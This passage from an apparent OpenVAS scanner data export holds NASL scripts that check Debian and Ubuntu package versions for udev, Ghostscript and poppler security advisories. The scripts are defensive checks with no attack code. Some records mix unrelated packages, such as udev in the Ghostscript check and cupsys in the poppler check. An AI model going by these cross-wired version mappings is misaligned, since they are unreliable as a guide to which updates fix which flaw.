isdpkgvuln(pkg:\"libvolume-id-dev\", ver:\"113-0ubuntu17.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id0\", ver:\"113-0ubuntu17.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"113-0ubuntu17.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"volumeid\", ver:\"113-0ubuntu17.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id-dev\", ver:\"117-8ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id0\", ver:\"117-8ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"117-8ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id-dev\", ver:\"124-9ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id0\", ver:\"124-9ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"124-9ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:39", "description": "The remote host is missing an update to udev\nannounced via advisory DSA 1772-1.", "cvss3": {}, "published": "2009-04-20T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1772-1 (udev)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231063842", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063842", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1772_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1772-1 (udev)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sebastian Kramer discovered two vulnerabilities in udev, the /dev and\nhotplug management daemon.\n\nCVE-2009-1185\n\nudev does not check the origin of NETLINK messages, allowing local\nusers to gain root privileges.\n\nCVE-2009-1186\n\nudev suffers from a buffer overflow condition in path encoding,\npotentially allowing arbitrary code execution.\n\nFor the old stable distribution (etch), these problems have been fixed in\nversion 0.105-4etch1.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 0.125-7+lenny1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your udev package.\";\ntag_summary = \"The remote host is missing an update to udev\nannounced via advisory DSA 1772-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201772-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63842\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1772-1 (udev)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"0.105-4etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id-dev\", ver:\"0.105-4etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id0\", ver:\"0.105-4etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id0\", ver:\"0.125-7+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"0.125-7+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id-dev\", ver:\"0.125-7+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:29:09", "description": "The remote host is missing an update to gs-gpl\nannounced via advisory USN-757-1.", "cvss3": {}, "published": "2009-04-20T00:00:00", "type": "openvas", "title": "Ubuntu USN-757-1 (gs-gpl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0196", "CVE-2009-0796", "CVE-2009-1185", "CVE-2009-0792", "CVE-2009-1016", "CVE-2009-0584", "CVE-2007-6725", "CVE-2009-1186", "CVE-2008-6679", "CVE-2009-0583", "CVE-2009-1012", "CVE-2008-5259"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:63856", "href": "http://plugins.openvas.org/nasl.php?oid=63856", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_757_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_757_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-757-1 (gs-gpl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n gs-esp 8.15.2.dfsg.0ubuntu1-0ubuntu1.2\n gs-gpl 8.15-4ubuntu3.3\n\nUbuntu 8.04 LTS:\n libgs8 8.61.dfsg.1-1ubuntu3.2\n\nUbuntu 8.10:\n libgs8 8.63.dfsg.1-0ubuntu6.4\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-757-1\";\n\ntag_insight = \"It was discovered that Ghostscript contained a buffer underflow in its\nCCITTFax decoding filter. If a user or automated system were tricked into\nopening a crafted PDF file, an attacker could cause a denial of service or\nexecute arbitrary code with privileges of the user invoking the program.\n(CVE-2007-6725)\n\nIt was discovered that Ghostscript contained a buffer overflow in the\nBaseFont writer module. If a user or automated system were tricked into\nopening a crafted Postscript file, an attacker could cause a denial of\nservice or execute arbitrary code with privileges of the user invoking the\nprogram. (CVE-2008-6679)\n\nIt was discovered that Ghostscript contained additional integer overflows\nin its ICC color management library. If a user or automated system were\ntricked into opening a crafted Postscript or PDF file, an attacker could\ncause a denial of service or execute arbitrary code with privileges of the\nuser invoking the program. (CVE-2009-0792)\n\nAlin Rad Pop discovered that Ghostscript contained a buffer overflow in the\njbig2dec library. If a user or automated system were tricked into opening a\ncrafted PDF file, an attacker could cause a denial of service or execute\narbitrary code with privileges of the user invoking the program.\n(CVE-2009-0196)\n\nUSN-743-1 provided updated ghostscript and gs-gpl packages to fix two\nsecurity vulnerabilities. This update corrects the same vulnerabilities in\nthe gs-esp package.\n\nOriginal advisory details:\n It was discovered that Ghostscript contained multiple integer overflows in\n its ICC color management library. If a user or automated system were\n tricked into opening a crafted Postscript file, an attacker could cause a\n denial of service or execute arbitrary code with privileges of the user\n invoking the program. (CVE-2009-0583)\n\n It was discovered that Ghostscript did not properly perform bounds\n checking in its ICC color management library. If a user or automated\n system were tricked into opening a crafted Postscript file, an attacker\n could cause a denial of service or execute arbitrary code with privileges\n of the user invoking the program. (CVE-2009-0584)\";\ntag_summary = \"The remote host is missing an update to gs-gpl\nannounced via advisory USN-757-1.\";\n\n \n\n\nif(description)\n{\n script_id(63856);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2008-5259\", \"CVE-2009-0584\", \"CVE-2009-0583\", \"CVE-2009-1012\", \"CVE-2007-6725\", \"CVE-2009-1016\", \"CVE-2009-1185\", \"CVE-2009-0796\", \"CVE-2009-0792\", \"CVE-2009-0196\", \"CVE-2008-6679\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-757-1 (gs-gpl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-757-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.15-4ubuntu3.3\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp\", ver:\"8.15.2.dfsg.0ubuntu1-0ubuntu1.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.15-4ubuntu3.3\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-doc\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-esp-dev\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-aladdin\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-common\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp-x\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-x\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-dev\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs8\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-doc\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-common\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-esp-dev\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-aladdin\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp-x\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-x\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-dev\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs8\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"079-0ubuntu35.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id-dev\", ver:\"113-0ubuntu17.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id0\", ver:\"113-0ubuntu17.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"113-0ubuntu17.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"volumeid\", ver:\"113-0ubuntu17.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id-dev\", ver:\"117-8ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id0\", ver:\"117-8ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"117-8ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id-dev\", ver:\"124-9ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvolume-id0\", ver:\"124-9ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"124-9ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:28:41", "description": "The remote host is missing an update to poppler\nannounced via advisory USN-759-1.", "cvss3": {}, "published": "2009-04-20T00:00:00", "type": "openvas", "title": "Ubuntu USN-759-1 (poppler)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1181", "CVE-2009-1188", "CVE-2009-1185", "CVE-2009-1180", "CVE-2009-0164", "CVE-2009-1268", "CVE-2009-1266", "CVE-2009-0799", "CVE-2009-1210", "CVE-2009-1186", "CVE-2009-1182", "CVE-2009-1267", "CVE-2009-0166", "CVE-2009-1269", "CVE-2009-0147", "CVE-2009-1187", "CVE-2009-1183", "CVE-2009-0800", "CVE-2009-0146", "CVE-2009-0163", "CVE-2009-1179"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:63858", "href": "http://plugins.openvas.org/nasl.php?oid=63858", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_759_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_759_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-759-1 (poppler)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n libpoppler1 0.5.1-0ubuntu7.5\n libpoppler1-glib 0.5.1-0ubuntu7.5\n\nUbuntu 8.04 LTS:\n libpoppler-glib2 0.6.4-1ubuntu3.2\n libpoppler2 0.6.4-1ubuntu3.2\n\nUbuntu 8.10:\n libpoppler-glib3 0.8.7-1ubuntu0.2\n libpoppler3 0.8.7-1ubuntu0.2\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-759-1\";\n\ntag_insight = \"Will Dormann, Alin Rad Pop, Braden Thomas, and Drew Yao discovered that\npoppler contained multiple security issues in its JBIG2 decoder. If a user\nor automated system were tricked into opening a crafted PDF file, an\nattacker could cause a denial of service or execute arbitrary code with\nprivileges of the user invoking the program.\";\ntag_summary = \"The remote host is missing an update to poppler\nannounced via advisory USN-759-1.\";\n\n \n\n\nif(description)\n{\n script_id(63858);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-0146\", \"CVE-2009-0147\", \"CVE-2009-0166\", \"CVE-2009-0799\", \"CVE-2009-0800\", \"CVE-2009-1179\", \"CVE-2009-1180\", \"CVE-2009-1181\", \"CVE-2009-1182\", \"CVE-2009-1183\", \"CVE-2009-1187\", \"CVE-2009-1188\", \"CVE-2009-1210\", \"CVE-2009-1266\", \"CVE-2009-1267\", \"CVE-2009-1268\", \"CVE-2009-1269\", \"CVE-2009-0163\", \"CVE-2009-0164\", \"CVE-2009-1185\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-759-1 (poppler)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-759-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libpoppler-dev\", ver:\"0.5.1-0ubuntu7.5\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler-glib-dev\", ver:\"0.5.1-0ubuntu7.5\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler-qt-dev\", ver:\"0.5.1-0ubuntu7.5\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler1-glib\", ver:\"0.5.1-0ubuntu7.5\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler1-qt\", ver:\"0.5.1-0ubuntu7.5\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler1\", ver:\"0.5.1-0ubuntu7.5\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"poppler-utils\", ver:\"0.5.1-0ubuntu7.5\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler-dev\", ver:\"0.6.4-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler-glib-dev\", ver:\"0.6.4-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler-glib2\", ver:\"0.6.4-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler-qt-dev\", ver:\"0.6.4-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler-qt2\", ver:\"0.6.4-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler-qt4-2\", ver:\"0.6.4-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler-qt4-dev\", ver:\"0.6.4-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler2\", ver:\"0.6.4-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"poppler-utils\", ver:\"0.6.4-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler-dev\", ver:\"0.8.7-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler-glib-dev\", ver:\"0.8.7-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler-glib3\", ver:\"0.8.7-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler-qt-dev\", ver:\"0.8.7-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler-qt2\", ver:\"0.8.7-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler-qt4-3\", ver:\"0.8.7-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler-qt4-dev\", ver:\"0.8.7-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpoppler3\", ver:\"0.8.7-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"poppler-dbg\", ver:\"0.8.7-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"poppler-utils\", ver:\"0.8.7-1ubuntu0.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2-gnutls10\", ver:\"1.2.7-4etch7\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.3.9-2ubuntu9.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.3.9-2ubuntu9.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.3.9-2ubuntu9.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-dbg\", ver:\"1.3.9-2ubuntu9.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.3.9-2ubuntu9.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.3.9-2ubuntu9.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.3.9-2ubuntu9.1\", 